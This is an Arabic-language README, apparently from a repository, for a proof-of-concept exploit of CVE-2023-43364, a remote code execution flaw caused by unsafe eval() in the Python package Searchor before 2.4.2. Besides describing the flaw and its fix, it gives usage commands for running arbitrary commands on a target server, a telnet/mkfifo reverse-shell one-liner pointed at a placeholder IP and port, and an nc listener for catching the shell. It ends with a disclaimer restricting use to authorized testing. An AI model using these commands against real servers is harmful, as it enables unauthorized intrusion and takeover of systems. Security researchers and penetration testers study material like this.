
استغلال POC عبر استخدام غير آمن لـ `eval()` في Searchor (< 2.4.2)
تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر استخدام غير آمن لـ
eval()في Searchor (< 2.4.2)
يعرض هذا المشروع استغلال CVE-2023-43364، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) تؤثر على حزمة بايثون Searchor (< 2.4.2).
تنتج المشكلة عن استخدام غير آمن لـ eval() على مدخلات يتحكم بها المستخدم، مما يسمح للمهاجمين بحقن وتنفيذ كود بايثون عشوائي.
تم إصلاح الثغرة بإزالة استخدام eval() غير الآمن، كما هو موضح في التصحيح الرسمي:
تفاصيل تقنية إضافية ونشرة أمان:
يوفر هذا المفهوم الإثباتي (PoC) طرق تنفيذ متعددة، بما في ذلك تنفيذ الأوامر، والتحقق من الاختبار، والقذائف العكسية.
نفّذ أمرًا بسيطًا (id) للتحقق من تنفيذ الكود:
python3 CVE-2023-43364.py <URL> --test
تنفيذ أمر مخصص شغّل أي أمر على الخادم المستهدف:
python3 CVE-2023-43364.py <URL> -a "whoami"
أمثلة:
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"
قذيفة عكسية ابدأ مستمعًا على جهازك:
nc -lvnp 4444
شغّل الاستغلال:
python3 CVE-2023-43364.py <URL> <LHOST>
هذا المشروع مخصص لـ:
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
استخدم هذا الاستغلال فقط في بيئات خاضعة للسيطرة أو على أنظمة لديك إذن صريح لاختبارها